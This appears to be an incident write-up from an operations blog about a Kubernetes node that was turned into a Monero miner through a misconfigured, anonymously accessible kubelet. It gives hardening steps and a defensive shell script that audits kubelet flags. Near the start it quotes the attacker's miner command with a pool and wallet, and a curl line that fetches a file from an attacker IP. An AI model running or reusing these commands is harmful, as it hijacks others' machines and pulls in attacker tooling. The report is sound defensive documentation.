
How a Misconfigured Kubelet Led to a Crypto‑Mining Breach and How to Secure Your Cluster

The article recounts a Kubernetes cluster intrusion where a misconfigured kubelet allowed crypto‑mining, details the forensic steps taken—including empty iptables, kubelet API exposure, and commented‑out settings—and offers concrete hardening recommendations to prevent similar attacks.


Invasion Phenomenon

During routine checks, a machine in a self‑built Kubernetes cluster was found running an abnormal process that turned out to be a crypto‑mining program. The running command and the download used to fetch further tooling were:

    ./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
    curl -s http://45.9.148.35/scan_threads.dat

The machine was being used for mining, and the Docker service was stopped immediately while the malicious binary was dumped for analysis.

Specific Cause Investigation

iptables empty

The host had no iptables rules at all, so every listening port on the node was reachable from the network.

kubelet exposed

Investigation revealed that the kubelet component was compromised; logs showed suspicious entries indicating direct API access.

kubelet misconfiguration

The kubelet was started with parameters that allowed anonymous API access: the configuration line meant to disable anonymous access had been mistakenly commented out, so the kubelet fell back to accepting unauthenticated requests.

Because the affected node was newly added, the issue was detected quickly, and the rest of the cluster was inspected to ensure no similar exposure existed.

Improvement Plan

Enforce a default‑deny firewall on each node, closing all ports unless explicitly opened for administrative access.

Avoid assigning public IPs to nodes that do not need external exposure; limit internet‑facing services.

Configure kubelet and other services to bind only to internal network interfaces instead of 0.0.0.0.

Require authentication on any path that currently permits anonymous access, and consider a dedicated authorization system.

Adopt scripted, auditable procedures for production changes rather than manual operations to reduce human error.
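The settings behind this incident (anonymous kubelet access left enabled, the kubelet listening on 0.0.0.0) and the bind-to-internal-interface and strict-authentication items of the plan above can be checked mechanically. The script below is an added example, not the author's tooling: it audits a kubelet command line (for instance from `ps -o args= -C kubelet` or a systemd drop-in) against the kubelet's insecure-leaning defaults; the two sample command lines are constructed, and the check for the unauthenticated read-only port goes one step beyond what the article discusses.

```shell
#!/bin/sh
# Audit a kubelet command line for the settings that exposed the node:
# anonymous API access, permissive authorization and a listener bound to
# every interface. Assumes flags are given as --flag=value or --flag value.

# Print the value of the named flag, or nothing if it is absent (the kubelet
# then uses its default, which for these flags is the exposed setting).
flag_value() {
  printf '%s\n' "$2" | tr ' ' '\n' | awk -v f="--$1" '
    $0 == f {getline; print; exit}
    index($0, f "=") == 1 {print substr($0, length(f) + 2); exit}'
}

# Print one FINDING line per weak setting; exit status is the finding count.
audit_kubelet_args() {
  cmdline="$1"; findings=0
  anon=$(flag_value anonymous-auth "$cmdline")
  authz=$(flag_value authorization-mode "$cmdline")
  addr=$(flag_value address "$cmdline")
  ro_port=$(flag_value read-only-port "$cmdline")
  # Default for --anonymous-auth is true: only an explicit false is safe.
  if [ "$anon" != "false" ]; then
    echo "FINDING: anonymous API access (--anonymous-auth=${anon:-unset, defaults to true})"
    findings=$((findings + 1))
  fi
  # Default --authorization-mode is AlwaysAllow; Webhook delegates to the API server.
  if [ "$authz" != "Webhook" ]; then
    echo "FINDING: permissive authorization (--authorization-mode=${authz:-unset, defaults to AlwaysAllow})"
    findings=$((findings + 1))
  fi
  # Default --address is 0.0.0.0, i.e. every interface, public IPs included.
  case "${addr:-0.0.0.0}" in
    0.0.0.0|::) echo "FINDING: bound to all interfaces (--address=${addr:-unset})"; findings=$((findings + 1)) ;;
  esac
  # Default --read-only-port is 10255 and unauthenticated; 0 disables it.
  if [ "${ro_port:-10255}" != "0" ]; then
    echo "FINDING: unauthenticated read-only port (--read-only-port=${ro_port:-unset, defaults to 10255})"
    findings=$((findings + 1))
  fi
  return "$findings"
}

# Constructed sample command lines (not taken from the incident host).
WEAK_ARGS='/usr/bin/kubelet --kubeconfig=/etc/kubernetes/kubelet.conf --anonymous-auth=true --address=0.0.0.0'
HARDENED_ARGS='/usr/bin/kubelet --kubeconfig=/etc/kubernetes/kubelet.conf --anonymous-auth=false --authorization-mode=Webhook --address=10.0.0.12 --read-only-port=0'

audit_kubelet_args "$WEAK_ARGS"; echo "weak findings: $?"
audit_kubelet_args "$HARDENED_ARGS"; echo "hardened findings: $?"
```

Run it against the node's real kubelet command line; a non-zero exit status means at least one of the settings that caused this breach is still in place.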

Conclusion

The breach gave the attacker full control over Docker on the compromised node, highlighting the severity of misconfigurations. Strengthening host firewalls and limiting unnecessary port exposure are the quickest and most effective steps to improve cluster security.

Tags: Kubernetes, firewall, security, kubelet, Cluster Hardening, crypto mining

Written by Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
